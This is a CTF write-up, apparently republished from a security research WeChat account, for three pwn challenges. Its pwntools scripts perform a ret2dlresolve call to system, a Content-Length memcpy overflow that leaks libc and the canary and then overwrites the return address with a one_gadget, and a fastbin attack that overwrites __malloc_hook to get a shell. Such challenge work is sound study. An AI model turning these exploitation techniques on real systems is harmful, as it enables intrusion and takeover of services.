mimic-game
from pwn import *
# mimic32 (i386): stack overflow turned into a ret2dlresolve call to system().
# No libc leak is needed: the chain makes the dynamic linker resolve "system"
# for us.  The offsets 48 and 80 in the overflow buffer are the author's
# measured values for this binary, not derived here.
context.log_level = "debug"
context.terminal = ['tmux', 'sp', '-h']
context.binary = elf = ELF('./mimic32')
context.arch = 'i386'
p = process("./mimic32")
# gdb.attach(p, "b *0x080489A7")
# pause()

# Forged link_map/reloc data that binds "system" and calls it with our argv.
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh -c 'cat flag'"])

# Chain: read() the forged structures from stdin into dlresolve.data_addr,
# then jump through the PLT resolver with the forged reloc index.
rop = ROP(context.binary)
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

# Overflow buffer: chain at +48, resolver data at +80.  The data after +80 is
# presumably what the chain's read() then consumes from the still-buffered
# stdin — confirm against the size of the vulnerable read if this is reused.
payload = flat({48: rop.chain(), 80: dlresolve.payload})
p.sendlineafter(">> ", "1")
p.sendafter("> ", payload)
p.interactive()
msgparser
memcpy 这里存在栈溢出：a1 是栈上的目标缓冲区，ptr 指向 POST 包的 body 数据，len 则直接取自 POST 包的 Content-Length 头。Content-Length 完全由请求方控制，且没有与目标缓冲区大小比较，因此既能把 body 之外的内存拷贝进来（下面用它泄露 libc 地址和 canary），也能用超长 body 覆盖返回地址。
from pwn import *
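# msgparser: memcpy() into a stack buffer with the length taken from the
# request's Content-Length header.  A short body with a large Content-Length
# copies bytes from beyond the body (an info leak); a long body overwrites
# the saved return address.
context.log_level = 'debug'
context.terminal = ['tmux', 'sp', '-h']
p = process("./chall")
# gdb.attach(p, "b *0x555555555873")
# pause()

# Request template; the two {} slots are Content-Length and the body.  The
# body begins with a one-byte message type (\x01 / \x02).  There is no blank
# line between the headers and the body here — the challenge parser
# apparently tolerates that; a real HTTP parser would not.
payload = '''POST /
Host: www.mrskye.com
Accept-Encoding: gzip
Content-Length: {}
Connection: close
{}'''
log.info("len:" + hex(len(payload)))

# NOTE(review): the published listing had its backslashes stripped ('x01',
# 'x02').  The Content-Length arithmetic later in the script
# (1 + 0x58 == 89) only works if the type marker is a single 0x01 byte, so
# the escapes are restored here.
# First a type-1 request (Content-Length 8, one-byte body), then a type-2
# request whose Content-Length (96) far exceeds its one-byte body, so the
# memcpy pulls in bytes beyond the body and the reply carries them back.
p.recvuntil("msg> ")
p.send(payload.format(8, '\x01'))
p.recvuntil("msg> ")
p.send(payload.format(96, '\x02'))

# Parse the over-read: skip 8 bytes, take a libc pointer, skip 0x48 more,
# take the stack canary.  The libc delta is the (runtime address - mapping
# base) difference the author measured in gdb for the challenge libc; it is
# specific to that build and must be re-measured for any other libc.
p.recv(8)
leak_addr = u64(p.recv(8))
log.info("leak_addr:" + hex(leak_addr))
libc_addr = leak_addr - (0x7ffff7dd5660 - 0x7ffff79e2000)
log.info("libc_addr:" + hex(libc_addr))
p.recv(0x48)
canary = u64(p.recv(8))
log.info("canary:" + hex(canary))

# one_gadget offset for the same libc build; re-derive if the libc changes.
onegadget = libc_addr + 0x10a41c
log.info("onegadget:" + hex(onegadget))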
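def getshell(len, text):
    """Build a minimal HTTP/1.1 POST whose Content-Length is chosen
    independently of the real body size.

    Args:
        len: value written into the Content-Length header, i.e. how many
            bytes the server's memcpy will copy regardless of how long
            ``text`` is.  (Name kept for call compatibility although it
            shadows the builtin.)
        text: request body, appended verbatim after the header terminator.

    Returns:
        The request as a str: CRLF-terminated headers, a blank line, then
        ``text``.
    """
    # NOTE(review): the published listing lost its backslashes ("rnrn");
    # the original exploit terminates the headers with CRLF CRLF, which is
    # restored here.
    header = 'POST / HTTP/1.1\r\nHost: hills.tonen.et\r\nContent-Length: %d\r\n\r\n' % len
    return header + text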
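# Return-address overwrite.  Body layout: type byte + 0x58 filler puts the
# canary at offset 0x59, then 8 bytes for the saved rbp, then the return
# address, which becomes the one_gadget.  Content-Length 0x100 exceeds the
# body so the memcpy copies the whole chain onto the stack.
# NOTE(review): the published listing had 'x01' with the backslash stripped;
# the offsets only line up with a single 0x01 byte, restored here.
# NOTE(review): ``canary + 1`` means the leaked value is apparently off by
# one from the live canary (e.g. its low byte disturbed during the leak);
# confirm in gdb before reusing this against another build.
p.recvuntil('msg> ')
payload = getshell(0x100, '\x01' + 'a' * 0x58 + p64(canary + 1) + 'a' * 0x8 + p64(onegadget))
p.sendline(payload)

# A second, exactly-sized request (1 + 0x58 == 89 bytes) is sent before
# dropping to the shell.  Why it is needed is not visible here — presumably
# the vulnerable function only returns once a well-formed request has been
# handled.
p.recvuntil('msg> ')
payload = getshell(89, '\x01' + 'a' * 0x58)
p.send(payload)
p.interactive()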
ghost
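# Run ./pwn under the challenge's own dynamic loader and libc.
#
# The published steps used sudo to symlink the challenge ld.so.2 into /lib64
# and then pointed the interpreter at that symlink.  That needs root, leaves
# a stray loader in a system directory, and makes a system path resolve to an
# untrusted CTF artefact.  Pointing the interpreter at the local file by
# absolute path gives the same result with no system-wide change.
#
# Run from the challenge directory (the one holding pwn, ld.so.2, libc.so.6).
patchelf --set-interpreter "$PWD/ld.so.2" ./pwn
# A NEEDED entry containing a slash is opened as a path.  The original used
# ./libc.so.6, which only resolves when the binary is launched from this
# directory; an absolute path keeps it working from anywhere.
patchelf --replace-needed libc.so.6 "$PWD/libc.so.6" ./pwn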
from pwn import*
# ghost (amd64): heap challenge driven through the add/show/delete menu
# helpers below.  The binary is expected to have been patched (patchelf
# steps above) to load the challenge's own ld.so.2 / libc.so.6, so a plain
# process('./pwn') already runs against the right libc.
context(os='linux', arch='amd64', log_level=True)
libc = ELF('libc.so.6')   # only used for the __malloc_hook symbol offset
p = process('./pwn')
def add(id, size, data):
    """Menu option 1: allocate slot ``id`` with ``size`` bytes and write ``data``.

    Each answer is sent only after its prompt has been seen; the content
    line is sent straight away, since the script never waits for a prompt
    before it.
    """
    answers = (('>>', '1'), ('idx:', str(id)), ('len:', str(size)))
    for prompt, reply in answers:
        p.recvuntil(prompt)
        p.sendline(reply)
    p.sendline(str(data))
def show(id):
    """Menu option 2: have the binary print slot ``id``.

    The output is left on ``p`` for the caller to read.
    """
    for prompt, reply in (('>>', '2'), ('idx:', str(id))):
        p.recvuntil(prompt)
        p.sendline(reply)
def delete(id):
    """Menu option 3: free slot ``id``."""
    for prompt, reply in (('>>', '3'), ('idx:', str(id))):
        p.recvuntil(prompt)
        p.sendline(reply)
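# Heap groom.  Sizes are the menu 'len' values (chunk sizes are those plus
# header/rounding).  The intermediate allocations (0x1790, 0xbd8, 0x408) are
# the author's measured layout for this binary; they are not derived here.
add(0, 0x7, '10')
add(1, 0x1790, '0')
add(2, 0x67, '0' * 0x3)
delete(0)
add(3, 0xbd8, '0' * 0x1)
add(3, 0x408, '0' * 0x1)

# Leak: showing slot 1 now returns a libc pointer (apparently an arena
# pointer left behind by the frees/splits above).  Only 6 bytes of a
# userland pointer are printed, so zero-pad to 8.  The delta is the
# gdb-measured distance from that pointer to the libc base for the
# challenge libc; it is build-specific.
# NOTE(review): the published listing had 'x00' with the backslash stripped,
# which would raise (ljust needs a one-character fill); restored to '\x00'.
show(1)
p.recv(14)
leak = u64(p.recv(6).ljust(8, '\x00'))
print(hex(leak))
libcbase = leak - (0x7ffff7dd3de8 - 0x00007ffff7a12000)
print(hex(libcbase))

# Fastbin attack.  Free slot 2 (a 0x70-size chunk), then reach its header
# from an overlapping 0x308 allocation: slot 2's chunk header apparently
# lies 0x258 bytes into that allocation, so the payload rewrites its size
# (0x71) and fd.  __malloc_hook - 0x13 is the usual target because the bytes
# just before it look like a 0x7f chunk size to malloc's fastbin check —
# confirm that holds for this libc.
delete(2)
add(3, 0x308, '0' * 0x1)
add(3, 0x308, '0' * 0x1)
malloc_hook = libcbase + libc.sym['__malloc_hook']
payload = '0' * 0x258 + p64(0x71) + p64(malloc_hook - 0x13)
add(3, 0x308, payload)

# Two 0x67 allocations: the first takes slot 2's chunk back out of the bin,
# the second is served the forged fd.  Its user data starts at
# __malloc_hook - 0x13 + 0x10 == __malloc_hook - 3, so three pad bytes
# followed by the gadget land exactly on the hook.
# 0xe66b5 is a one_gadget offset for the same libc; re-derive if it changes.
one_gadget = libcbase + 0xe66b5
add(2, 0x67, '0' * 0x3)
add(2, 0x67, '000' + p64(one_gadget))

# Trigger: the next malloc runs the hook.  The menu is driven by hand rather
# than via add(), presumably because the hook fires on the malloc that
# follows the 'len' prompt, before a data line is ever read.
p.recvuntil('>>')
p.sendline('1')
p.recvuntil('idx:')
p.sendline(str(1))
p.recvuntil('len:')
p.sendline(str(7))
# Debugger hook from the published script, kept out of the normal run: it
# needs a terminal and the following raw_input() would block before the
# shell is handed over.  Matches the commented-out attach in the other
# scripts.
# gdb.attach(p, 'b *0x00555555554d3d')
# pause()
p.interactive()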
本文始发于微信公众号(山石网科安全技术研究院):2021巅峰极客线上初赛Writeup | PWN部分